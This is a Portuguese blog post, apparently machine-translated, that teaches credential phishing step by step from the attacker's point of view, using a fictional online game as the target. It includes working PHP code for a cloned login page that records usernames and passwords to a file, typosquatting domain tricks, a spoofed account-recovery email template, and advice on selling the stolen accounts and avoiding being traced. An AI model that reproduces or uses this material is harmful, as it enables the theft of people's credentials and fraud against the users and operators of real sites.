Vamos estudar 1 pouco de Phishing ?


Lembrando, Todo Conteúdo que Que estar nesse site
Somos nos que criamos e Postamos
então qual quer duvida fale com Conosco.


Vamos estudar 1 pouco de Phishing ?
-----------------------------------------------
Introdução ao Phishing
Phishing é um método de roubar os usuários ", ou um usuário de específico, informação (tipicamente login) para um site particular, referido aqui como o site-alvo através da personificação ou fingindo ser um site legítimo.
Existem várias técnicas de phishing, a uma comum a ser a criação de um site que parece idêntico ou quase idêntico ao do site de destino. No entanto, o site de phishing envia as informações que o usuário entra com o golpista, o homem que está operando o esquema de phishing. Devido ao site de phishing olhando muito semelhante ao site de destino, os usuários erroneamente levar o site de phishing, como o site de destino e inserir suas informações. O phisher agora tem acesso a qualquer usuário que é vítima de informações do site de phishing. Isto é referido como clonar phishing.
Outra forma de phishing é criar um site que não é um clone do sítio alvo, mas aparece relacionado. Por exemplo, um golpista pode criar um site falso de pagamento para uma faculdade que faz parecer o colégio é simplesmente usando um serviço de terceiros para lidar com os pagamentos. Neste artigo, vamos estar a olhar para um tipo muito básico e comum de phishing: login phishing. No entanto, note que o phishing pode tornar-se muito mais complexa. Por exemplo, um phisher dedicado pode criar uma réplica de todo um site de compras online que permite aos usuários fazer o login e encomendar produtos. Embora isso requer muito mais trabalho do lado do phisher, isso permite que o phisher mais controle sobre a informação que recolhe, como ele pode exigir endereço, informações de cartão de crédito, número de telefone, data de nascimento e muito mais para colocar um fim.
Supõe-se que um conhecimento básico de HTML e PHP já está possuído pelo leitor. Se você não possuir este conhecimento, levará algum tempo para olhar para os fundamentos da mesma.
Coleta de Informações
No presente trabalho, vamos percorrer uma situação hipotética, do ponto de vista de um golpista. Nesta situação simples, um cliente ofereceu-se para comprar contas de alto nível para um jogo chamado "Rich Fantasia Online."
A fim de fazer um golpe de phishing eficaz, precisamos reunir mais informações. Em alguns casos, isso pode resultar em pesquisar na internet por horas, no entanto, no nosso caso, isso é bastante simples. Em primeiro lugar, precisamos descobrir o que as contas são consideradas de alto nível. Podemos perguntar a este cliente.
O cliente nos diz que ele vai pagar R $ 20 para o nível de 100 contas, mas vai pagar o dobro para qualquer coisa acima de 150. Ele nos dá a URL para o site, richfantasyonline.com. (Nota: Não é um site real) Antes de decidir usar phishing para isso, é preciso primeiro verificar se existem vulnerabilidades que nos permitam concluir o trabalho sem phishing, como injeção de SQL ou arquivo remoto de upload.
Nós não encontramos qualquer vulnerabilidade, no entanto, ao olhar sobre o local encontramos duas coisas de interesse
1. Cada usuário cadastrado no jogo é registrado automaticamente em um fórum no site. Por padrão, os endereços de e-mail do usuário são exibidas na seção de perfil.
2. O site tem um quadro de líderes, mostrando os principais 10.000 jogadores, classificados por nível. Ele permite ao usuário pesquisar a placa do líder para os usuários cumprimento de certos requisitos, tais como tipo de personalidade, nível mínimo e tempo jogado.
Nós escrevemos um script que usa-los para a nossa vantagem, verificando se um usuário está acima do nível 100, e em caso afirmativo, armazena seu nome de usuário e e-mail em um arquivo CSV. Este arquivo armazena nomes de usuários 7331 do jogador e-mail.
Nós google para encontrar uma outra comunidade do fórum separado do fórum do jogo, rfonlineforums.org /. (Nota: Também não é um site real).
Enquanto este fórum é menor, e-mails do usuário não são exibidos. No entanto, o fórum é composto por muitos jogadores de alto nivelados. Nós olhamos ao redor para encontrar o fórum tem uma newsletter. Na esperança de encontrar mais informações, se inscrever para ele. A newsletter e-mails nós como um CC com todo mundo se inscreveram para o endereço de e-mail do boletim incluído. Nós adicionamos esses e-mails para nossa lista de e-mails. Site da rica fantasia on-line permite a pesquisa de usuários por e-mail, para que adicionar apenas os que resultam em um usuário que está acima do nível 100. Temos agora a nossa lista de endereços de e-mail. A partir das informações que reunimos, podemos agora avançar para o passo 2, escolher um site de destino.
Escolher um destino
Um passo importante em qualquer tentativa de phishing é para o phisher para escolher um site de destino. O alvo escolhido depende de objetivos e habilidades do phisher. A pergunta mais importante que um golpista precisa perguntar a si mesmo é "Quais são as informações que eu preciso?"
Em nosso cenário, precisamos de duas coisas: nomes de usuário e senhas.
É fácil de ver, neste caso, o melhor site-alvo para representar seria o site oficial do jogo, como senhas de usuários será o mesmo que em senhas de jogos.
Criando o site Phishing
Agora que já decidiu sobre o site que deseja clonar, temos de cloná-lo. Primeiro, precisamos decidir como muito do que precisamos clonar. Quando a coleta de informações, descobrimos que o site tinha apenas uma página de login em richfantasyonline / login.php. Essa deve ser a única página que precisamos clonar neste caso.
A maneira mais fácil de clonar isso é usando o nosso browser. Firefox / Tor recomendado. Se usássemos outro navegador, devemos ser capazes de descobrir como fazer isso no-lo facilmente, também. Nós vamos para a página da Web, clique em "Firefox" ou "Browser Tor" no canto superior esquerdo e clique em "Salvar como." Criamos uma pasta para ele e salvá-lo como um arquivo htm. (Configuração padrão para o Firefox / Tor). Nosso navegador irá automaticamente salvar todo o CSS, Javascript, HTML e imagens necessárias para exibir o site. (Estes arquivos podem ser incluídos neste PDF, se você baixou o arquivo ZIP originais)
Agora, temos que editar esse site. Abrimos o arquivo no nosso editor de texto e procure por "forma" para encontrar o formulário HTML que envia a informação de login de usuário. Aqui está o código achamos que está interessado polegadas
<form method="post" action="login.php">
Este código é o início da <form>. method = "post" diz-nos o formulário usa a solicitação POST para enviar dados para o servidor. action = "login.php" nos diz que a solicitação POST está sendo enviado pararichfantasyonline.com / login.php.
Porque queremos manter o site olhando como semelhante ao original possível, não queremos mudar isso. Isso significa que será a edição da página. Php que tinha guardado em um arquivo. Htm mais tarde. Por enquanto, porém, temos mais duas coisas para procurar: a seção do formulário nome de usuário e senha. Porque vimos que "Username" estava na frente da caixa de texto o nome de usuário, buscamos isso e encontrar o código que o controla, junto com o código da senha logo abaixo dele.
<div class="name ">Username</div>
<div class="field" style="">
<input name="usr" size="28" id="input_usr" type="text">
</div>
</div>
<div class="row text ">
<div class="name">Password</div>
<div class="field"><input name="pwd" value="" size="28" type="password"></div>
O negrito indica onde a nossa atenção vai. name = "usr" vamos nós sabemos que o POST nome da variável PHP será nomeado usr, enquanto que a senha será pwd.
Agora estamos prontos para mudar o arquivo. Htm para. Php. O arquivo deve ser nomeado "login.php.htm" agora. Nós colocamos a pasta que contém o nosso arquivo para o nosso localhost e renomeie o arquivo para "login.php". Enquanto estamos renomear arquivos, criamos um arquivo txt. Na mesma pasta com o nome "capture.txt" Nós também usar esse tempo para criar um arquivo "Index.php", que está vazio. (Isto é feito para evitar que o diretório de exibir todos os arquivos nele se acessado)
Agora, adicione o seguinte código para o topo da primeira página.
<?php
if(isset($_POST['usr']) AND isset($_POST['pwd']))
{
}
?>
Este código, realmente não faz nada ainda. Ele apenas verifica se os dados que nós queremos foi enviado isset ($ var) - verifica se $ var está definida. $ _POST [$ String] - referências a solicitação POST feito com o nome de $ string isset ($ _POST ['usr']) - Verifica se a variável post 'usr' está definido.
Agora vamos adicionar mais código dentro do bloco if.
$fileName = 'capture.txt';
$fileHandle = fopen($fileName, 'a') or die;
$userinfo = $_POST['usr'].','.$_POST['pwd']."\n";
fwrite($fileHandle, $userinfo);
fclose($fileHandle);
echo '<script>alert(\'Server Error: Please try
again\');';
echo 'window.location =
"http://richfantasyonline.com/login.php";</script>';
Vamos quebrar este código para baixo.
$fileName = 'capture.txt';
$fileHandle = fopen($fileName, 'a') or die;
Este código abre o arquivo que fizemos anteriormente ", capture.txt". Nós abri-lo no no modo append, para que possamos adicionar dados a ele.
$userinfo = $_POST['usr'].','.$_POST['pwd']."\n";
fwrite($fileHandle, $userinfo);
A primeira linha cria uma seqüência que contém os dados do usuário em forma de "username, password" A segunda linha adiciona essa string para o arquivo "capture.txt".
fclose($fileHandle);
Esta linha fecha o arquivo.
echo '<script>alert(\'Server Error: Please try again\');';
echo 'window.location =
"http://richfantasyonline.com/login.php";</script>';
Estas duas linhas de Javascript saída. A primeira linha faz com que uma caixa de alerta, dizendo a vítima que havia um erro no servidor e tente novamente. A segunda linha redireciona a vítima para a página de login atual.
Os erros são muito comuns ea maioria dos usuários são propensos a acreditar que a caixa de alerta. Redirecionando-as para o local atual, nós asseguramos que eles vão acessar corretamente em sua segunda tentativa, o que torna ainda menos provável que a vítima perceber o que aconteceu.
Aqui está o código completo PHP:
<?php
if(isset($_POST['usr']) AND isset($_POST['pwd']))
{
$fileName = 'capture.txt';
$fileHandle = fopen($fileName, 'a') or die;
$userinfo = $_POST['usr'].','.$_POST['pwd']."\n";
fwrite($fileHandle, $userinfo);
fclose($fileHandle);
echo '<script>alert(\'Server Error: Please try again\');';
echo 'window.location =
"http://richfantasyonline.com/login.php";</script>';
}
?>
Fazer o upload do site
Agora que criamos o site, é preciso enviá-lo para a internet. Isto significa que precisamos decidir sobre o nome de domínio que deseja usar. Precisamos registrar um domínio que se assemelha bastante ao domínio do real, que a vítima não vai notar a diferença. Neste caso, precisamos de algo que se parece com richfantasyonline.com.
Existem inúmeras técnicas que podemos usar.:
• O registro de um domínio com uma extensão de domínio diferente:. Co, net, org... . .
• Adição de hífens: rich-fantasyonline, richfantasy-online. . .
• Subdomans: rich.fantasyonline, r.ichfantasyonline. . .
• substituição de carta: rlchfantasyonline, richfanlasyonline richfantasyonlrne. . .
• remoção Carta: richfanasyonline, richfantasyonlne, richfantsyonline. . .
• Carta de comutação: richfatnasyonine, richfantasyolnine, richfatnasyonline. . .
Nós decidimos registrar richantasyonline.com para este site de phishing. Em seguida, encontrei um serviço de hospedagem gratuita que permitiu PHP e se inscreveu para o seu serviço. Nós carregado os arquivos com os dados do site para o servidor. Tentamos fazer o login norichantasyonline.com / login.php com o nome de usuário "phi" e senha "Sher" Estamos redirecionado para o site de destino e depois verificar o arquivo capture.txt em richantasyonline.com / capture.txt. O arquivo contém "phi, sher" então sabemos que o site de phishing está funcionando. Agora, temos de espalhar o link phishing para os usuários.
Espalhando o site
O site de phishing não é bom se ninguém vai para ele. Agora, ninguém tem qualquer idéia que existe. Um método muito comum e simples de corrigir isso é através de e-mail. Para que isso seja eficaz, é preciso obter uma amostra de e-mail do site de destino. Nós se inscrever para o site com o nome de usuário "PhillyFish", em seguida, passar por processo do site "Esqueci minha senha" para receber este e-mail:
Subject: Rich Fantasy Online – Password Recovery
Sender: recovery@richfantasyonline.com
Body:
Hello, PhillyFish
Este e-mail foi enviado por um pedido de recuperação de senha foi feita para sua conta no rico
Fantasia Online. Se você não fez esta solicitação, ignore este e-mail.
To recovery your password go to <a href=“richfantasyonline/recover.php?recid=ITdjToeldmbWo112D0”>richfantasyonline/recover.php?recid=ITdjToeldmbWo112D0</a>
Rico de fantasia online
"Never Walk Alone"
Não responda a este e-mail.
Um e-mail de recuperação básico. Vamos agora modelar nosso e-mail de uma forma similar, após a recuperação de e-mail como base para o layout.
Subject: Rich Fantasy Online – Account Recovery
To: {email}
Body:
Hello, {username}
Our servers have noticed suspicious activity on your account and believe your account
may have been compromised by a third party.
You may login with your username and password to recover your account at <a href=“http://richantasyonline.com/login.php…”>http://richfantasyonline.com/login.php…</a>
We apologize for any inconvenience.
Rich Fantasy Online
“Never walk alone”
Do not reply to this email.
Nós, é claro, a mudança {username} e {email} para o específico user / e-mail que está enviando. Note que usamos um assunto similar, cumprimentando e fechando comunicado. Nós usamos a tag HTML <a> de vincular a nossa página de login, no entanto, fazê-lo aparecer em texto como a página de login atual. Nós adicionamos um parâmetro para a URL chamada "accountrecovery" que não tem nenhum efeito sobre o desempenho, mas parece mais crível.
Em seguida, usamos um programa de spoofing e-mail para enviar este e-mail a partir do endereço recovery@richfantasyonline.com. Podemos fazer isso porque nós não nos importamos se a vítima responde ao e-mail, como o e-mail não será verificada. Isso também irá aumentar o believableness de nosso e-mail, uma vez que parece vir derichfantasyonline.com.
Nós escrevemos programas para automatizar o preenchimento do {username} e {email} campos, spoofing o endereço de e-mail, e enviar o e-mail.
Agora vamos esperar e terminar o esquema de phishing.
Acabamento Up
O site de phishing está fora e na posse das vítimas. Vamos agora esperar para coletar as informações que temos roubado. Após uma semana, temos informações de login 142 vítimas ". Verificamos que as informações de login das vítimas está correto e agrupá-los em duas categorias com base no nível. Temos 22 contas sobre o nível 150 e 108 contas sobre o nível 100, e algumas contas que fazer o login falhou diante. Relatamos volta ao nosso cliente, que nós, em seguida, vender as informações verificadas a, fazendo com que cerca de US $ 3000.
Podemos continuar a verificar o site de phishing para mais usuários, excluir o site ou simplesmente esquecê-la. Nós completamos com sucesso o nosso esquema de phishing.
Notas para lembrar
1. Phishing pode ser facilmente rastreada até o phisher se o phisher não tomar o tempo para esconder adequadamente sua identidade. Alguns erros comuns:
• Pagar por um nome de domínio com o dinheiro ligado a sua verdadeira identidade
• Não escondendo corretamente seu endereço de IP ao se registrar, upload ou acessando o site de phishing
• Não escondendo corretamente seu endereço de IP ao enviar e-mails falsos.
2. "Capture.txt" é um nome de arquivo inseguro. Alguém pode perceber o site de phishing é um golpe e tentar encontrar o arquivo de armazenamento de informações do usuário. Usando um nome aleatório, como "ctugjdleozzzmfaokengsjdg 1kg4fst.txt", ou uma forma diferente de armazenamento, como um banco de dados, um golpista pode proteger seu site de phishing contra os outros a ganhar a informação que recolheu.
3. Os sites de phishing são relatados e removido com freqüência.
4. Phishing é ilegal.
5. Phishing pode ficar muito mais complexa. Um phisher pode fazer um site em pleno funcionamento para roubar mais informações.
6. Pode ser uma boa idéia para criar código de phishing mais seguro do que o mostrado neste trabalho. Por exemplo, um golpista pode impedir o seu local de armazenamento de informações a partir do mesmo IP duas vezes. Isso impede que alguém repetidamente o envio de informações para o site de phishing para preencher as informações coletadas do phisher com informações junk.
O phisher pode também aceitar apenas nomes de usuários e senhas que atendem aos critérios para se inscrever no site de destino, como comprimento da senha.
7. Em nosso cenário, o site alvo utilizado PHP para scripts do lado do servidor. Portanto, nós usamos PHP para o nosso phisher. Um phisher necessita de ajustar o lado linguagem de scripting servidor usa de acordo com o sítio alvo. Se um site utiliza ASP, em seguida, o golpista provavelmente vai usar ASP, bem como, para manter credibilidade.
8. E-mail não é a única maneira de espalhar um phishing site. Cross Site Scripting (XSS) e formas de engenharia social também pode ser utilizado. Por exemplo, um golpista pode achar que uma caixa de comentário em um site é vulnerável a XSS. Ele pode, então, usar o Javascript para alertar a vítima que a sessão expirou e precisa fazer o login novamente, redirecionando-as para o site de phishing.
Conclusão
Phishing é um golpe que é usado para roubar informações das vítimas. Phishing podem variar em complexidade de uma página web muito básico imitação de um site totalmente funcional. Neste artigo, nós olhamos para uma breve introdução ao phishing e atravessou uma situação hipotética phishing do ponto de vista de um golpista. Fomos pontos-chave no processo de phishing, como escolher um alvo, a criação do site e divulgação do site. Revisamos, também, as notas chave para se lembrar sobre phishing, como erros comuns que revelam a identidade de um golpista e brevemente sobre outras maneiras de espalhar um phishing site.





Comentários

Postagens mais visitadas